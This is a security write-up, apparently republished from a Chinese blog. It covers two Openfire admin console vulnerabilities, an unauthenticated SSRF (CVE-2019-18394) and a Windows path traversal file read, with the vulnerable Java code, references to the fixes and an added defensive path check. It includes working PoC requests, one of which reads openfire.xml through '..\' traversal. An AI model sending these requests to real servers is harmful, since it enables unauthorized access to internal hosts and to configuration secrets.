Openfire Admin Console SSRF & Arbitrary File Read Vulnerabilities PoC

Posted by admin on 2022-01-12 18:29:48


Openfire (formerly known as Wildfire and Jive Messenger) is an instant messaging (IM) and group chat server. It is an XMPP server written in Java and released under the Apache License 2.0.


SSRF CVE-2019-18394

This vulnerability allows unauthenticated users to launch SSRF attacks. The relevant code is as follows:

FaviconServlet.java

    ...
    public void doGet(HttpServletRequest request, HttpServletResponse response) {
        String host = request.getParameter("host");
        // Check special cases where we need to change host to get a favicon
        host = "gmail.com".equals(host) ? "google.com" : host;

        byte[] bytes = getImage(host, defaultBytes);
        if (bytes != null) {
            writeBytesToStream(bytes, response);
        }
    }

    private byte[] getImage(String host, byte[] defaultImage) {
        // If we've already attempted to get the favicon twice and failed,
        // return the default image.
        if (missesCache.get(host) != null && missesCache.get(host) > 1) {
            // Domain does not have a favicon so return default icon
            return defaultImage;
        }
        // See if we've cached the favicon.
        if (hitsCache.containsKey(host)) {
            return hitsCache.get(host);
        }
        byte[] bytes = getImage("http://" + host + "/favicon.ico");
        ....
    }
    ...

It is a very simple vulnerability: the host parameter is concatenated into the request URL without any validation. The PoC is as follows:

    GET /getFavicon?host=192.168.176.1:8080/secrets.txt? HTTP/1.1

The fix is as follows:

[Image in the original post: screenshot of the fix]


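Arbitrary File Read Vulnerability

This vulnerability only affects users who have installed Openfire on Windows. The relevant code is as follows: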

PluginServlet.java

    ...
    @Override
    public void service(HttpServletRequest request, HttpServletResponse response) {
        String pathInfo = request.getPathInfo();
        if (pathInfo == null) {
            response.setStatus(HttpServletResponse.SC_NOT_FOUND);
        }
        else {
            try {
                // Handle JSP requests.
                if (pathInfo.endsWith(".jsp")) {
                    ...
                }
                // Handle servlet requests.
                else if (getServlet(pathInfo) != null) {
                    handleServlet(pathInfo, request, response);
                }
                // Handle image/other requests.
                else {
                    handleOtherRequest(pathInfo, response);
                }
            }
            ...
    }

    private void handleOtherRequest(String pathInfo, HttpServletResponse response) throws IOException {
        String[] parts = pathInfo.split("/");
        // Image request must be in correct format.
        if (parts.length < 3) {
            response.setStatus(HttpServletResponse.SC_NOT_FOUND);
            return;
        }

        String contextPath = "";
        int index = pathInfo.indexOf(parts[1]);
        if (index != -1) {
            contextPath = pathInfo.substring(index + parts[1].length());
        }

        File pluginDirectory = new File(JiveGlobals.getHomeDirectory(), "plugins");
        File file = new File(pluginDirectory, parts[1] + File.separator + "web" + contextPath);

        // When using dev environment, the images dir may be under something other than web.
        Plugin plugin = pluginManager.getPlugin(parts[1]);
        ...
    }

The PoC is as follows:

    GET /plugins/search/..\..\..\conf\openfire.xml HTTP/1.1
    Host: localhost:9090
    Cookie: JSESSIONID=node01aaib5x4g4p781q3i2m2tm74u91.node0;

The fix is as follows:

[Image in the original post: screenshot of the fix]
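
A containment check that closes this kind of traversal, as an added example; it is not the Openfire patch and not code from the original post. `PluginPathCheck`, `resolveInsidePlugin` and the `openfire-home` directory are hypothetical names, and the sample inputs are constructed.

```java
import java.io.File;
import java.io.IOException;
import java.nio.file.Path;

public class PluginPathCheck {

    // Resolves pathInfo the way handleOtherRequest does, but returns the file
    // only if its canonical location is still under plugins/<name>/web.
    static File resolveInsidePlugin(File home, String pathInfo) throws IOException {
        String[] parts = pathInfo.split("/");
        if (parts.length < 3) {
            return null; // same format check as the servlet
        }
        int index = pathInfo.indexOf(parts[1]);
        String contextPath = pathInfo.substring(index + parts[1].length());

        File pluginDir = new File(home, "plugins");
        File webRoot = new File(new File(pluginDir, parts[1]), "web");
        File candidate = new File(webRoot, contextPath);

        // getCanonicalFile() resolves "." and ".." with the platform's own
        // separator rules, so a "..\" that split("/") never saw is collapsed
        // here on Windows before the comparison.
        Path plugins = pluginDir.getCanonicalFile().toPath();
        Path root = webRoot.getCanonicalFile().toPath();
        Path target = candidate.getCanonicalFile().toPath();

        // Path.startsWith compares whole name elements, so ".../web-old" does
        // not count as being inside ".../web".
        boolean contained = root.startsWith(plugins) && target.startsWith(root);
        return contained ? target.toFile() : null;
    }

    public static void main(String[] args) throws IOException {
        // Constructed sample inputs; "openfire-home" is a hypothetical directory.
        File home = new File(System.getProperty("java.io.tmpdir"), "openfire-home");
        String[] samples = {
            "/search/images/logo.png",
            "/search/..\\..\\..\\conf\\openfire.xml",
            "/search/../../conf/openfire.xml",
        };
        for (String pathInfo : samples) {
            File f = resolveInsidePlugin(home, pathInfo);
            System.out.println(pathInfo + " -> " + (f == null ? "rejected" : "allowed"));
        }
    }
}
```

On Windows the backslash sample is rejected because the canonical path leaves the web directory. On Linux and macOS a backslash is an ordinary filename character, so that sample stays inside the web directory, which matches the statement above that only Windows installations are affected.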

References

  • https://issues.igniterealtime.org/browse/OF-1885
  • https://issues.igniterealtime.org/browse/OF-1886
  • https://swarm.ptsecurity.com/openfire-admin-console/



This article was first published on the WeChat official account 宽字节安全: Openfire Admin Console SSRF & Arbitrary File Read Vulnerabilities PoC
